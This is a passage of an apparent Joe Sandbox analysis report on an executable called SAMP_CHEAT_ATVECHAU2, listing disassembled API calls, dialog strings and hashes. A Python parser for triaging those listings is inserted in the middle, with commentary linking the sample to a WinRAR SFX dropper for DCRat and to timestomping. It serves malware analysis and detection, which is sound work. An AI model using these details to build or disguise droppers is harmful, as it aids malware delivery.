                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: f98a78376f907da80885942c8db2aa5014eef6331a11f0f7d9e017279d35f546
                                                    • Instruction ID: f6e733685cc019f70090f95373f67d937aa8e398afe114d8562a98e47d0e47c6
                                                    • Opcode Fuzzy Hash: f98a78376f907da80885942c8db2aa5014eef6331a11f0f7d9e017279d35f546
                                                    • Instruction Fuzzy Hash: 87118FB1644708AFC3315F6ADC84BA7FBECEB64784F14482EF1DAD2240DA7199418B70
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0B2BE
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D0B2D6
                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D0B304
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: GETPASSWORD1
                                                    • API String ID: 445417207-3292211884
                                                    • Opcode ID: 26f7b209256b769c7472e2e93a8f206afe8c31632980ea8f37a9140c0a4c8c90
                                                    • Instruction ID: 4dbaf76ca36709273ef98f422a8b079c3489b15a22b3513d926fe911f1a0f082
                                                    • Opcode Fuzzy Hash: 26f7b209256b769c7472e2e93a8f206afe8c31632980ea8f37a9140c0a4c8c90
                                                    • Instruction Fuzzy Hash: E111E132904318BADB219A74AC59FFF3B6CEF19760F140022FA89F21D0C7A0DA059771
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: 3fe7089ad31661105c4f1b334199d33bc6337af589ae88458312f0216198cffa
                                                    • Instruction ID: ef0f18b44756a11269142ab9c072a7914bc2515d501041cd3ca0e399ec22c915
                                                    • Opcode Fuzzy Hash: 3fe7089ad31661105c4f1b334199d33bc6337af589ae88458312f0216198cffa
                                                    • Instruction Fuzzy Hash: B001717A604345AFD7118FA8FC44B5A7FAAF749395B04042AF849C37B0C631D850EBB0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                    • Instruction ID: 2d0100dd17c13937799cff4a07c6e677bf21a34d43f59b9eb98a71f06873ab62
                                                    • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                    • Instruction Fuzzy Hash: 9CA12771904286AFD7118F58E8B17EEFBE6EF55310F18416DE4859B281CA3499C1C7B0
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CF7F69,?,?,?), ref: 00CFA3FA
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CF7F69,?), ref: 00CFA43E
                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?), ref: 00CFA4BF
                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CFA4C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime
                                                    • String ID:
                                                    • API String ID: 2287278272-0
                                                    • Opcode ID: 4ccbe8361a4792bdcd2f64e32232cf8bd95425a0f746ddbdd359977b9562149c
                                                    • Instruction ID: 7ca14b43da9af165d1243ee0bcb4cf94e0a4a1f76d78fdaf2ab65d1f60f1f723
                                                    • Opcode Fuzzy Hash: 4ccbe8361a4792bdcd2f64e32232cf8bd95425a0f746ddbdd359977b9562149c
                                                    • Instruction Fuzzy Hash: 6E41AEB12483899AD731DF24DC45BEEFBE49B84300F044919B6E9D3190D6A4DB4C9B63
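Added example (not part of the Joe Sandbox report or of its tooling): a small Python parser for the per-function API listings in this section. It turns each "• Name.MODULE(args), ref: ADDR" line into a structured call record, keeps the "Part of subcall function" calls apart from the function's own calls, and applies one triage rule to the decoded arguments. The sample input is constructed from three of the blocks above (the CreateFileW/SetFileTime function, the GETPASSWORD1 dialog handler and the __fprintf_l/_strncpy function); the function names parse_report and triage and the tag wording are the example's own. Two things the decoded values make explicit. First, the CreateFileW that precedes SetFileTime passes dwDesiredAccess 40000000 (GENERIC_WRITE), dwCreationDisposition 00000003 (OPEN_EXISTING) and dwFlagsAndAttributes 02000000 (FILE_FLAG_BACKUP_SEMANTICS), so the function rewrites the timestamps of a file that already exists; that is the call shape an archive extractor uses to restore stored timestamps and also the one a timestomping routine uses to forge them, so it is worth checking which applies before treating it as an indicator. Second, the String IDs ASKNEXTVOL, GETPASSWORD1, RENAMEDLG and REPLACEFILEDLG, together with SeRestorePrivilege/SeSecurityPrivilege and "Thread pool initialization failed.", are the dialog resource names and messages of the WinRAR self-extracting stub, which suggests the submitted executable is an SFX wrapper and the DCRat payload is what it drops.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One "• Name.MODULE(args), ref: ADDR" line. The parenthesised args and the
# "Part of subcall function ADDR:" prefix are both optional (cf. _strncpy above).
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Any other "• Key: value" metadata line (Source File, API ID, String ID, ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Win32 constants for the triage rule (winnt.h / fileapi.h).
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000

# Constructed input: three function blocks copied in shape from the report above.
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CF7F69,?,?,?), ref: 00CFA3FA
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?), ref: 00CFA4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CFA4C6
• Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
• API ID: File$Create$CloseHandleTime
• String ID:
APIs
  • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
• EndDialog.USER32(?,00000001), ref: 00D0B2BE
• GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D0B2D6
Strings
• Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
APIs
• __fprintf_l.LIBCMT ref: 00CFD954
• _strncpy.LIBCMT ref: 00CFD99A
• Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
• String ID: $%s$@%s
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int per hex literal, None per '?' placeholder
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set when the call is listed under a callee

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def direct_apis(self):
        """APIs the function calls itself, excluding those of its callees."""
        return {c.name for c in self.calls if c.subcall_of is None}

def _parse_args(text):
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")] if text else []

def parse_report(text):
    """Split report text into one FuncRecord per function block."""
    records, cur = [], None
    for line in text.splitlines():
        header = line.strip()
        # A block starts at an "APIs" or "Strings" header; the same headers
        # inside a block (e.g. "Strings" after the API list) are not new blocks.
        if header in ("APIs", "Strings") and (cur is None or "Source File" in cur.fields):
            records.append(cur := FuncRecord())
            continue
        if cur is None:
            continue
        if m := API_RE.match(line):
            cur.calls.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]),
                                     int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"].strip()] = m["val"].strip()
    return records

def triage(rec):
    """Tag the file-timestamp pattern; other rules can be added the same way."""
    tags = []
    if {"CreateFileW", "SetFileTime"} <= rec.direct_apis():
        for c in rec.calls:
            if c.name != "CreateFileW" or len(c.args) < 7:
                continue
            # The listed args run on into stack noise; only the first seven are
            # CreateFileW's (name, access, share, sa, disposition, flags, template).
            access, disposition, flags = c.args[1], c.args[4], c.args[5]
            if access is not None and access & GENERIC_WRITE and disposition == OPEN_EXISTING:
                tags.append("writes timestamps to an existing file")
            if flags is not None and flags & FILE_FLAG_BACKUP_SEMANTICS:
                tags.append("opens with FILE_FLAG_BACKUP_SEMANTICS")
            break
    return tags
```

Feeding the text of a whole "Execution Graph" section to parse_report gives one record per function block; the Associated, Opcode ID and fuzzy-hash lines land in the record's fields dict untouched, so a second rule can key on them (for instance to join records across dumps by Opcode ID) without changing the parser.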
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    • Opcode ID: 837ca0338a8970060fd96547e5d5e1bcf53a575800fa4aed706a6fd6d927ad29
                                                    • Instruction ID: a4058e821d965f454f6b97132ba41ba6bb6c3ce6e2e067378169b15b001ca13b
                                                    • Opcode Fuzzy Hash: 837ca0338a8970060fd96547e5d5e1bcf53a575800fa4aed706a6fd6d927ad29
                                                    • Instruction Fuzzy Hash: C341C37190076A9BCB659FA88C49AEF7BB8EF01351F044019FD45F7281DF30AE498AB1
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D191E0,?,00000000,?,00000001,?,?,00000001,00D191E0,?), ref: 00D1C9D5
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D1CA5E
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D16CBE,?), ref: 00D1CA70
                                                    • __freea.LIBCMT ref: 00D1CA79
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: fded36a9575a33ad893cd401063e106c3854fa6e59a15a90a6981c8b18b3bda7
                                                    • Instruction ID: a3e53bd1b0008e432c3fcbf3665246759e6ec41040850f3ab262b52128470f5d
                                                    • Opcode Fuzzy Hash: fded36a9575a33ad893cd401063e106c3854fa6e59a15a90a6981c8b18b3bda7
                                                    • Instruction Fuzzy Hash: A031A072A1021ABBDB25DF64EC41EEE7BA5EF41310B184168FC04E6250EB35CD91CBB0
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00D0A666
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D0A675
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D0A683
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00D0A691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 53000067290c8ca9cea962a0aea7e845556af7644b7afb4fc2315fe5a37cc7c4
                                                    • Instruction ID: c4d808f56cae59f6c449dd56eb6b7d23e6fc5f45d9883d225e03107aca85a6a3
                                                    • Opcode Fuzzy Hash: 53000067290c8ca9cea962a0aea7e845556af7644b7afb4fc2315fe5a37cc7c4
                                                    • Instruction Fuzzy Hash: 3BE01231952B21B7D3615F68BC0DB8B3E68AB05BA3F050101FE05D63D0DBB486008BB1
                                                    APIs
                                                      • Part of subcall function 00D0A699: GetDC.USER32(00000000), ref: 00D0A69D
                                                      • Part of subcall function 00D0A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D0A6A8
                                                      • Part of subcall function 00D0A699: ReleaseDC.USER32(00000000,00000000), ref: 00D0A6B3
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00D0A83C
                                                      • Part of subcall function 00D0AAC9: GetDC.USER32(00000000), ref: 00D0AAD2
                                                      • Part of subcall function 00D0AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D0AB01
                                                      • Part of subcall function 00D0AAC9: ReleaseDC.USER32(00000000,?), ref: 00D0AB99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease$CapsDevice
                                                    • String ID: (
                                                    • API String ID: 1061551593-3887548279
                                                    • Opcode ID: 9c3100a1868716b67ef2a242d5cda87325b348ae007fa9424661c3704b82e1de
                                                    • Instruction ID: 2066c1c1ecb9e2807e1428b5c4cc270b5471e05ca7a370297f31e3e59fe47dd8
                                                    • Opcode Fuzzy Hash: 9c3100a1868716b67ef2a242d5cda87325b348ae007fa9424661c3704b82e1de
                                                    • Instruction Fuzzy Hash: FB91D471604354AFD720DF29D844A2BBBE8FFD9710F00491EF99AD7260DB70A946CB62
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1B324
                                                      • Part of subcall function 00D19097: IsProcessorFeaturePresent.KERNEL32(00000017,00D19086,00000050,00D23A34,?,00CFD710,00000004,00D31030,?,?,00D19093,00000000,00000000,00000000,00000000,00000000), ref: 00D19099
                                                      • Part of subcall function 00D19097: GetCurrentProcess.KERNEL32(C0000417,00D23A34,00000050,00D31030), ref: 00D190BB
                                                      • Part of subcall function 00D19097: TerminateProcess.KERNEL32(00000000), ref: 00D190C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$.
                                                    • API String ID: 2667617558-3972193922
                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                    • Instruction ID: baa9f4297638f96171674c527492b8552d27d23cd96964acfe33649b31709451
                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                    • Instruction Fuzzy Hash: 98518271E00209BFDF14DFA8D881AEDB7B5EF58320F24416AE854E7341EB319E858B60
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF75E3
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00CFA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF777F
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                    • String ID: :
                                                    • API String ID: 3226429890-336475711
                                                    • Opcode ID: 8080aaeb02b6100ce9ca2ec9033a26de72284b995d495fecd8f050382e5eb451
                                                    • Instruction ID: 3f629d87a93f54b8aba6574974d4196fc3e8bfd59047f03481bb54348e377766
                                                    • Opcode Fuzzy Hash: 8080aaeb02b6100ce9ca2ec9033a26de72284b995d495fecd8f050382e5eb451
                                                    • Instruction Fuzzy Hash: D9415C7180015CAAEF65EB64CC99EFEB778EF45300F0041A6B709A2192DB745F89DB72
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: }
                                                    • API String ID: 176396367-4239843852
                                                    • Opcode ID: af17a164637507b663ef175e4a2f6f816be510b397940d2320439cdeb7ee681f
                                                    • Instruction ID: ce59ea3e09ab8f1c0dc1de2139e39c3d6f0647777ee76ec333bad85de7dff8ba
                                                    • Opcode Fuzzy Hash: af17a164637507b663ef175e4a2f6f816be510b397940d2320439cdeb7ee681f
                                                    • Instruction Fuzzy Hash: 1921D7729083165AD731DA64DC45F6AB3DCDF51764F08086BF548C3181EB65DD4883B2
                                                    APIs
                                                      • Part of subcall function 00CFF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CFF2E4
                                                      • Part of subcall function 00CFF2C5: GetProcAddress.KERNEL32(00D381C8,CryptUnprotectMemory), ref: 00CFF2F4
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00CFF33E), ref: 00CFF3D2
                                                    Strings
                                                    • CryptUnprotectMemory failed, xrefs: 00CFF3CA
                                                    • CryptProtectMemory failed, xrefs: 00CFF389
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CurrentProcess
                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                    • API String ID: 2190909847-396321323
                                                    • Opcode ID: 05944b39fe78e807c9334599178a31bb43b3b21cd1c4b5065422574bd65b0b1d
                                                    • Instruction ID: d4b19084feae29100142cc1141bd6a0670f91738d3c45eb0a3887c67f2861263
                                                    • Opcode Fuzzy Hash: 05944b39fe78e807c9334599178a31bb43b3b21cd1c4b5065422574bd65b0b1d
                                                    • Instruction Fuzzy Hash: BD112631A0132DABEF559F20DC42A7E3754FF10B20B10412EFE519B3A1DA74DE0B96A2
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CFB9B8
